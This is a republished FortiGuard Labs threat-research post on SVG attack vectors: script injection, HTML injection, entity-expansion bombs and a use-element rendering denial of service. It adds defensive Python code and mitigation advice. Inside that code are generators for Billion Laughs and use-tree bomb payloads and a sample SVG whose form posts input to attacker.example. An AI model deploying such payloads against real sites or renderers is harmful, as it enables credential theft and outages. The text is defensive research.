{"id":16824,"date":"2019-11-07T09:40:06","date_gmt":"2019-11-07T17:40:06","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2019\/11\/07\/news-10563\/"},"modified":"2019-11-07T09:40:06","modified_gmt":"2019-11-07T17:40:06","slug":"news-10563","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2019\/11\/07\/news-10563\/","title":{"rendered":"Anatomy of Scalable Vector Graphics (SVG) Attack Surface on the Web"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b><i>A FortiGuard Labs Threat Research Report<\/i><\/b><\/p>\n<h2>Introduction<\/h2>\n<p>Over the past few weeks, Fortinet&#8217;s FortiGuard Labs has been assessing web applications with embedded SVG images. As a result, we found a number of common issues in the web applications that we have examined. In this blog post, we will briefly talk about the nature of SVG and the common attack surfaces for SVG images that we have seen so far.<\/p>\n<p>The following list is a summary of the common SVG attack vectors that we have observed over time:<\/p>\n<ul>\n<li>Cross-Site Scripting<\/li>\n<li>HTML Injection<\/li>\n<li>XML Entity Processing \u2013 Billion Laughs Attack<\/li>\n<li>Denial of Service \u2013 The New SVG Billion Laughs Attack<\/li>\n<\/ul>\n<h2>SVG on the Web<\/h2>\n<p>SVG, which stands for <b>Scalable Vector Graphics<sup>[1]<\/sup><\/b>, is an XML-based vector image format for two-dimensional graphics with support for interactivity and animation. SVG images and their behaviors are defined in XML text files. They can be created and edited with any text editor, as well as with drawing software. All major modern web browsers have SVG rendering support.<\/p>\n<p>Let\u2019s look at an example to get a better understanding of SVG images. 
Below, we have written some code to render an SVG image:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_1192764442.img.png\/1573069642100\/svg-one.png\" alt=\"Figure 1: Code snippet of simple.svg\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1: Code snippet of simple.svg<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>We then saved this image as <a href=\"https:\/\/raw.githubusercontent.com\/fortiguard-lion\/svg_test\/master\/simple.svg\"><b>simple.svg<\/b><\/a> that can then be opened directly or included in an img\/image\/object\/embed HTML tag:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--5 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_1265414755.img.png\/1573069761101\/svg-two.png\" alt=\"Figure 2: Image rendered from code\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 2: Image rendered from code<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 2 shows the image generated by the code in Figure 1. It is a <b>rect<\/b> element that tells the browser to draw a red rectangle whose top-left corner is at (x, y) = (100, 100), with the given width and height.<\/p>\n<h2>SVG in the Wild<\/h2>\n<p>Though SVG provides flexibility that enables the creation of more dynamic web content, it also introduces additional security risks. In this next section we will discuss the common attack vectors that we observed in a number of major websites we encountered online.<\/p>\n<h3><b>1.\u00a0Cross-Site Scripting<\/b><\/h3>\n<p>All aspects of an SVG document can be accessed and manipulated using scripts in a way similar to HTML. The default scripting language is ECMAScript (closely related to JavaScript) and there are defined Document Object Model (DOM) objects for every SVG element and attribute. Scripts are enclosed in &lt;script&gt; elements.<\/p>\n<p>This means that if a web server allows a user to upload an arbitrary SVG image and serves it back from its own origin, it is vulnerable to a Cross-Site Scripting<sup>[2]<\/sup> attack. The script runs whenever the file is opened directly or embedded through an object, embed or iframe element; a plain img tag renders the graphic but never executes scripts. Here we have put the script inside the image:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_38269823.img.png\/1573076826071\/svg-three.png\" alt=\"Figure 3: Code snippet of xss.svg\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3: Code snippet of xss.svg<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Here is the malicious image that we saved as <a href=\"https:\/\/raw.githubusercontent.com\/fortiguard-lion\/svg_test\/master\/xss.svg\"><b>xss.svg<\/b><\/a> and then opened directly:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript 
data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_737747699.img.png\/1573076863256\/svg-four.png\" alt=\"Figure 4: Cross-Site Scripting triggered via directly accessing file\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4: Cross-Site Scripting triggered via directly accessing file<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Here is what happens when it is embedded in an HTML page:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_595481722.img.png\/1573076944019\/svg-five.png\" alt=\"Figure 5: Cross-Site Scripting triggered via link file\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5: Cross-Site Scripting triggered via link file<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The JavaScript code executes in the context of the origin that served the file. When uploads are hosted on the application\u2019s own domain, the attacker\u2019s script therefore runs with that domain\u2019s cookies, DOM access and credentialed requests, and can, for example, exfiltrate session data or act on the victim\u2019s behalf.<\/p>\n<h3><b>2.\u00a0HTML Injection<\/b><\/h3>\n<p>In some contexts the script element is caught by a sanitizer. However, SVG still has a feature that lets us inject HTML markup. 
As mentioned before, SVG is XML, so we cannot simply drop HTML into it: HTML that is not well-formed XML breaks the parse, and even well-formed tags are treated as unknown SVG elements unless they belong to the XHTML namespace.<\/p>\n<p>To get around this, SVG has an element known as <b>foreignObject<\/b> that allows the inclusion of elements from a different XML namespace. In the context of a browser, this would most likely be (X)HTML.<\/p>\n<p>Let\u2019s take a look at the <a href=\"https:\/\/raw.githubusercontent.com\/fortiguard-lion\/svg_test\/master\/html.svg\"><b>html.svg<\/b><\/a> image:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_207500084.img.png\/1573077200869\/svg-six.png\" alt=\"Figure 6: Code snippet of html.svg\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 6: Code snippet of html.svg<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>When we add a <b>body<\/b> element inside a <b>foreignObject<\/b> and declare the <b>XHTML namespace<\/b> on it with the <b>xmlns<\/b> attribute, the body element and all its descendants are interpreted by the user agent as XHTML. 
Therefore, we are able to render any XHTML code from the SVG to the page:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_645367797.img.png\/1573077249705\/svg-seven.png\" alt=\"Figure 7: HTML Injection vulnerability\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 7: HTML Injection vulnerability<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>This ability to render arbitrary HTML means the image can carry phishing content, forms that post whatever the user types to an attacker, or requests against the application itself (CSRF), all from inside the uploaded SVG. An XHTML <b>script<\/b> element inside the <b>foreignObject<\/b> is also another well-known route to the Cross-Site Scripting shown above when a filter only looks for the SVG <b>script<\/b> element.<\/p>\n<h3><b>3.\u00a0XML Entity Processing \u2013 Billion Laughs Attack<\/b><\/h3>\n<p>Since SVG is XML, an SVG file can carry a DTD and declare <b>entities<\/b>. Entities are named shortcuts for a piece of text or a special character and can be declared as internal or external.<\/p>\n<p style=\"margin-left: 40.0px;\"><b>An Internal Entity can be declared via the following syntax:<\/b><\/p>\n<p style=\"margin-left: 40.0px;\">&lt;!ENTITY entity-name &quot;entity-value&quot;&gt;<\/p>\n<p style=\"margin-left: 40.0px;\"><b>An External Entity can be declared via the following syntax:<\/b><\/p>\n<p style=\"margin-left: 40.0px;\">&lt;!ENTITY entity-name SYSTEM &quot;URI\/URL&quot;&gt;<\/p>\n<p>External entities are the basis of XML External Entity (XXE) attacks: a parser that resolves them can be made to read local files or contact internal hosts. Browser XML parsers do not fetch external entities from arbitrary URLs and have been heavily fuzzed, so on the client this is a minor concern; note, however, that any server-side component that parses uploaded SVGs (image converters, thumbnailers, sanitizers) is a separate parser with its own XXE and entity-expansion exposure and should have DTD processing disabled. 
Because of this, we will only talk about the abuse of an Internal Entity instead.<\/p>\n<p>Inside <a href=\"https:\/\/raw.githubusercontent.com\/fortiguard-lion\/svg_test\/master\/entity.svg\"><b>entity.svg<\/b><\/a>:\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_21415921.img.png\/1573077477947\/svg-eight.png\" alt=\"Figure 8: Code snippet of entity.svg\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 8: Code snippet of entity.svg<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As seen above, we defined the Entity <b>lab<\/b> at line 2 and then we call it inside the SVG element. Figure 9 shows the result:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_247678361.img.png\/1573077517905\/svg-nine.png\" alt=\"Figure 9: Entity lab loaded into the page\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 9: Entity lab loaded into the page<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>It works! 
Let\u2019s try another example \u2013 <a href=\"https:\/\/raw.githubusercontent.com\/fortiguard-lion\/svg_test\/master\/entity_2.svg\"><b>entity_2.svg<\/b><\/a>:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_762445167.img.png\/1573077553705\/svg-ten.png\" alt=\"Figure 10: Code snippet of entity_2.svg\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 10: Code snippet of entity_2.svg<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Here is the result:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_1561035158.img.png\/1573077584355\/svg-eleven.png\" alt=\"Figure 11: Entity lab2 loaded into the page\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 11: Entity lab2 loaded into the page<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As can be seen, the text is duplicated once for each reference to the entity, and an entity value may itself reference other entities: that is all the Billion Laughs attack needs.<\/p>\n<p>The Billion Laughs Attack<sup>[3]<\/sup> is a type of denial-of-service (DoS) attack which is aimed at parsers of XML documents. 
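<\/p>\n<p>The amplification can be measured without ever expanding anything, which is what a server-side upload filter that has to accept a DTD should do. The Python below is an added example written for this page, not code from the FortiGuard post or its sample files: it reads only the entity declarations from the DOCTYPE, stops the parser before the document body is reached, and then computes the fully expanded size of every entity from the declarations alone. The <b>build_billion_laughs<\/b> helper constructs a payload in the shape of the classic one, each <b>lolN<\/b> referencing <b>lolN-1<\/b> ten times; it is constructed sample data, not the post\u2019s <b>billion_laughs.svg<\/b>, and every function name here is this example\u2019s own.<\/p>\n
```python
import re
import xml.parsers.expat as expat

# A general entity reference such as &lol8; inside an entity's replacement text
ENTITY_REF = re.compile(r'&([A-Za-z_][A-Za-z0-9._:-]*);')

class DoctypeDone(Exception):
    pass

def declared_entities(xml_text):
    # Collect the internal general entities declared in the DTD. Parsing stops as
    # soon as the DOCTYPE ends, so the document body, and with it every &entity;
    # reference, is never expanded.
    decls = {}
    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        if not is_parameter and value is not None:
            decls[name] = value          # nested &refs; arrive unexpanded, as the XML spec requires
    def on_end_doctype():
        raise DoctypeDone()
    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity
    parser.EndDoctypeDeclHandler = on_end_doctype
    try:
        parser.Parse(xml_text, True)
    except DoctypeDone:
        pass
    return decls

def expanded_sizes(decls):
    # Characters each entity expands to: literal text counts as-is, each &ref; counts
    # as the expanded size of the referenced entity. Memoised, so a bomb is priced in
    # microseconds instead of being materialised; a reference cycle is an error.
    sizes = {}
    def size(name, stack):
        if name in stack:
            raise ValueError('recursive entity: ' + name)
        if name not in sizes:
            value = decls.get(name)
            if value is None:            # predefined (&lt; &amp; ...) or undeclared: one character
                return 1
            total, last = 0, 0
            for m in ENTITY_REF.finditer(value):
                total += m.start() - last + size(m.group(1), stack + (name,))
                last = m.end()
            sizes[name] = total + len(value) - last
        return sizes[name]
    for name in decls:
        size(name, ())
    return sizes

def worst_expansion(xml_text):
    # Largest single-entity expansion the DTD can produce, in characters (0 without a DTD)
    return max(expanded_sizes(declared_entities(xml_text)).values(), default=0)

def build_billion_laughs(levels=9, fanout=10):
    # Constructed sample in the shape of the classic payload: lol1 is ten lol0s,
    # lol2 is ten lol1s, ... so lolN expands to 3 * 10**N characters.
    decls = ['''<!ENTITY lol0 'lol'>''']
    for level in range(1, levels + 1):
        refs = '&lol{};'.format(level - 1) * fanout
        decls.append('''<!ENTITY lol{} '{}'>'''.format(level, refs))
    return ('''<!DOCTYPE svg [{}]>'''.format(''.join(decls)) +
            '''<svg xmlns='http://www.w3.org/2000/svg'><text>&lol{};</text></svg>'''.format(levels))
```
\n<p>On the nine-level sample, <b>worst_expansion<\/b> reports 3,000,000,000 characters from a file of well under a kilobyte, so a filter can reject anything whose worst case exceeds a small multiple of the input size before the file reaches a renderer or converter. For uploads that have no legitimate reason to carry a DOCTYPE at all, the simpler rule is to fail on the DOCTYPE itself, using the same handler mechanism.<\/p>\n<p>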
It is also referred to as an XML bomb or exponential entity expansion attack: a few nested entity declarations, each referencing the previous one several times, expand to gigabytes of text from a file of a few hundred bytes.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_184096815.img.png\/1573077631977\/svg-twelve.png\" alt=\"Figure 12: Code snippet of billion_laughs.svg\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 12: Code snippet of billion_laughs.svg<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Our browser took 4-5 seconds to respond when parsing this <a href=\"https:\/\/raw.githubusercontent.com\/fortiguard-lion\/svg_test\/master\/billion_laughs.svg\">billion_laughs.svg<\/a>. That\u2019s because modern browsers limit entity expansion, so in a browser the file costs a few seconds of parsing rather than the gigabytes of memory a naive parser would allocate, and it does not pose a real security risk there. Server-side parsers without such limits are a different matter.<\/p>\n<h3><b>4.\u00a0Denial of Service \u2013 The New SVG Billion Laughs Attack<\/b><\/h3>\n<p>As seen in the previous section, the Billion Laughs Attack only slows the browser down for around 4-5 seconds, because the entity expansion is capped. Unfortunately, there is another way to achieve the same blow-up with an SVG image that bypasses those defenses, since it involves no XML entities at all.<\/p>\n<p>This time, we will use an SVG-level reference, <b>xlink:href<\/b> on the <b>&lt;use&gt;<\/b> element, instead of an XML entity. 
Let\u2019s look at the payload for <a href=\"https:\/\/raw.githubusercontent.com\/fortiguard-lion\/svg_test\/master\/xlink_laughs.svg\"><b>xlink_laughs.svg<\/b><\/a>:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image.img.png\/1573077686307\/svg-thirteen.png\" alt=\"Figure 13: Code snippet of xlink_laughs.svg\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 13: Code snippet of xlink_laughs.svg<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The <b>xlink:href<\/b> attribute defines a reference to a resource as a reference IRI. The exact meaning of that link depends on the context of each element using it.<\/p>\n<p>The <b>&lt;use&gt;<\/b> element takes nodes from within the SVG document and duplicates them somewhere else.<\/p>\n<p>By defining the circle element in <b>a0<\/b> and then referencing each level from the next with several <b>&lt;use&gt;<\/b> elements (<b>a1<\/b> references <b>a0<\/b>, <b>a2<\/b> references <b>a1<\/b>, <b>a3<\/b> references <b>a2<\/b>, and so on), the number of circles the renderer has to instantiate is multiplied at every level. The file stays tiny and is perfectly well-formed XML, so entity-expansion limits never come into play; the blow-up happens in the renderer when it builds the instance tree. 
Here is the result:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_668706681.img.png\/1573077756087\/svg-fourteen.png\" alt=\"Figure 14: Billion Laughs Attack via xlink:href when parsing the malicious SVG\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 14: Billion Laughs Attack via xlink:href when parsing the malicious SVG<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Note that in the worst case this SVG crashes, or at least hangs, most modern browsers when it is rendered as an avatar, inline image, chat attachment, etc. on a website. Unlike the script-based vectors above, it also fires when the file is referenced from a plain img tag, because the work is done by the renderer rather than the script engine.<\/p>\n<p>Interestingly, the SVG shown in Figure 13 was also not caught by some open source SVG\/XML sanitizers when we tested them: it contains no script, no foreignObject and no DTD, so element and entity filters have nothing to remove. As a result, this lesser-known but syntactically valid SVG is likely to pass sanitization and trigger a denial of service.<\/p>\n<h2>Conclusion<\/h2>\n<p>In conclusion, an SVG is closer to an HTML document than to an image. As a result, we recommend that web developers not load untrusted SVG through object, embed or iframe elements if at all possible, and that user uploads be served from a separate origin, ideally with a Content-Security-Policy of <b>default-src 'none'<\/b>, which blocks both script execution and external loads inside the SVG document. Referenced from a plain img tag, an SVG never runs scripts or fetches external resources, although the rendering denial of service above still applies. 
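<\/p>\n<p>Putting those recommendations into code: the following Python is an added example written for this page, not code from the FortiGuard post, its sample repository, or any of the sanitizers it tested. It takes an uploaded SVG as text and either returns a cleaned copy or raises, covering all four vectors above: it refuses any DOCTYPE (so entities, internal or external, are never expanded), keeps only an allowlist of drawing elements in the SVG namespace (which removes <b>script<\/b>, <b>foreignObject<\/b> and its XHTML subtree), strips event-handler attributes, <b>javascript:<\/b> values and any <b>href<\/b> or CSS <b>url()<\/b> that is not a <b>#fragment<\/b>, and finally bounds how many nodes the <b>&lt;use&gt;<\/b> tree would expand to. The element allowlist, the 100,000-node budget, the function names and the three sample inputs (including <b>build_use_bomb<\/b>, which mirrors the a0, a1, a2, ... structure described for <b>xlink_laughs.svg<\/b>) are this example\u2019s own choices and constructed data, not the post\u2019s files.<\/p>\n
```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

SVG_NS = 'http://www.w3.org/2000/svg'
XLINK_NS = 'http://www.w3.org/1999/xlink'
XLINK_HREF = '{' + XLINK_NS + '}href'
ET.register_namespace('', SVG_NS)
ET.register_namespace('xlink', XLINK_NS)

# Element allowlist: shapes, text, grouping and paint servers. Anything else (script,
# foreignObject, a, image, style, animation, any non-SVG namespace) goes with its subtree.
ALLOWED = {'svg', 'g', 'defs', 'symbol', 'use', 'title', 'desc', 'rect', 'circle', 'ellipse',
           'line', 'polyline', 'polygon', 'path', 'text', 'tspan', 'linearGradient',
           'radialGradient', 'stop', 'clipPath', 'mask', 'pattern', 'marker'}
QUOTES = ' ' + chr(34) + chr(39)   # whitespace plus both quote characters CSS url() accepts

def split_qname(qname):
    # ElementTree spells qualified names as {uri}local; unqualified names have no namespace
    return tuple(qname[1:].split('}', 1)) if qname.startswith('{') else ('', qname)

def reject_dtd(svg_text):
    # Entities can only be declared inside a DOCTYPE, so refusing it rules out
    # entity expansion and external entities before anything is expanded.
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError('DOCTYPE / entity declarations are not allowed in uploaded SVG')
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(svg_text, True)

def clean_attributes(el):
    for name in list(el.attrib):
        value, local = el.attrib[name], split_qname(name)[1]
        if local.startswith('on'):                            # onload=, onclick=, ...
            del el.attrib[name]
        elif local == 'href' and not value.startswith('#'):   # external file or javascript: URL
            del el.attrib[name]
        elif 'javascript:' in value.lower() or any(            # e.g. style='fill: url(http://...)'
                not part.lstrip(QUOTES).startswith('#') for part in value.lower().split('url(')[1:]):
            del el.attrib[name]

def prune(el):
    clean_attributes(el)
    for child in list(el):
        ns, local = split_qname(child.tag)
        if ns != SVG_NS or local not in ALLOWED:
            el.remove(child)
        else:
            prune(child)

def count_instances(svg):
    # Upper bound on the nodes a renderer instantiates: each element once in place, plus a
    # full copy of the target for every <use>, recursively. Memoised; cycles are rejected.
    root = ET.fromstring(svg) if isinstance(svg, str) else svg
    ids = {el.get('id'): el for el in root.iter() if el.get('id')}
    memo = {}
    def cost(el, chain):
        key = id(el)
        if key in chain:
            raise ValueError('cyclic <use> reference')
        if key not in memo:
            chain = chain | {key}
            total = 1 + sum(cost(child, chain) for child in el)
            if split_qname(el.tag)[1] == 'use':
                ref = el.get(XLINK_HREF) or el.get('href') or ''
                target = ids.get(ref[1:]) if ref.startswith('#') else None
                if target is not None:
                    total += cost(target, chain)
            memo[key] = total
        return memo[key]
    return cost(root, frozenset())

def sanitize_svg(svg_text, max_nodes=100000):
    reject_dtd(svg_text)
    root = ET.fromstring(svg_text)
    if root.tag != '{' + SVG_NS + '}svg':
        raise ValueError('root element is not svg')
    prune(root)
    nodes = count_instances(root)
    if nodes > max_nodes:
        raise ValueError('SVG would expand to about %d rendered nodes' % nodes)
    return ET.tostring(root, encoding='unicode')

# Constructed samples, not the files from the post, carrying the same tricks it describes.
XSS_SAMPLE = '''<svg xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' onload='alert(1)'>
<rect x='100' y='100' width='50' height='50' fill='red' style='fill: url(http://attacker.example/x)'/>
<script>alert(document.domain)</script>
<foreignObject width='200' height='200'><body xmlns='http://www.w3.org/1999/xhtml'><form action='http://attacker.example/'><input/></form></body></foreignObject>
<use xlink:href='http://attacker.example/evil.svg#x'/>
</svg>'''
DTD_SAMPLE = '''<!DOCTYPE svg [ <!ENTITY lab 'FortiGuard Labs'> ]>
<svg xmlns='http://www.w3.org/2000/svg'><text>&lab;</text></svg>'''

def build_use_bomb(levels, fanout=10):
    # a1 uses a0 ten times, a2 uses a1 ten times, ...: 10**levels circles from a tiny file.
    parts = ['''<svg xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'><defs>''',
             '''<g id='a0'><circle cx='0' cy='0' r='1'/></g>''']
    for level in range(1, levels + 1):
        uses = '''<use xlink:href='#a{}'/>'''.format(level - 1) * fanout
        parts.append('''<g id='a{}'>{}</g>'''.format(level, uses))
    parts.append('''</defs><use xlink:href='#a{}'/></svg>'''.format(levels))
    return ''.join(parts)
```
\n<p>The expansion bound is what catches the Figure 13 style of payload that element filters miss: nine levels of ten references each count to several billion instances from a few hundred bytes of well-formed XML, and the memoised walk computes that without building anything. The budget should be tuned to the largest legitimate image you expect; a few hundred thousand nodes is already more than most icons or diagrams need. A production filter would additionally parse <b>style<\/b> contents with a real CSS parser rather than the string check used here, and should run the whole thing in a worker with a memory and time limit, since the XML parse itself is untrusted input handling.<\/p>\n<p>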
The web administrator should also limit the file types that can be uploaded.<\/p>\n<p>Otherwise, any untrusted SVG should be sanitized on the server at upload time, before it is stored or served:<\/p>\n<ul>\n<li>Strip dangerous elements and attributes: script, foreignObject, event-handler (on*) attributes and javascript: URLs, preferably by allowlisting the elements and attributes a plain drawing needs rather than blocklisting known-bad ones<\/li>\n<li>Reject references to external resources inside the SVG image (href\/xlink:href values and CSS url() tokens that are not #fragments within the file)<\/li>\n<li>Limit expansion inside an SVG image: reject any DOCTYPE or entity declaration, and bound the number of nodes the &lt;use&gt; tree expands to<\/li>\n<\/ul>\n<p>The following table compares browser vulnerabilities to malicious SVG files when those files are opened directly.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_365483115.img.png\/1573077912499\/screen-shot-2019-11-06-at-2.04.58-pm.png\" alt=\"Table: browser behavior for each malicious SVG sample when opened directly\"\/>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The SVG samples used in this report can be found at our GitHub site: <a href=\"https:\/\/github.com\/fortiguard-lion\/svg_test\/\">https:\/\/github.com\/fortiguard-lion\/svg_test\/<\/a><\/p>\n<h2>Solution<\/h2>\n<p><b>FortiGuard Labs has released the following IPS signatures that cover the vulnerabilities mentioned:<\/b><\/p>\n<p>TYPO3.CMS.Upload.XSS<\/p>\n<p>WordPress.Plugin.SafeSVG.DoS<\/p>\n<p>Drupal.Module.SVGSanitizer.DoS<\/p>\n<p>ImageMagick.Convert.LibXML.DoS<\/p>\n<p style=\"text-align: center;\">-== FortiGuard Lion Team ==-<\/p>\n<p><i>Learn more about\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">FortiGuard Labs<\/a>\u00a0and the FortiGuard Security Services\u00a0<a 
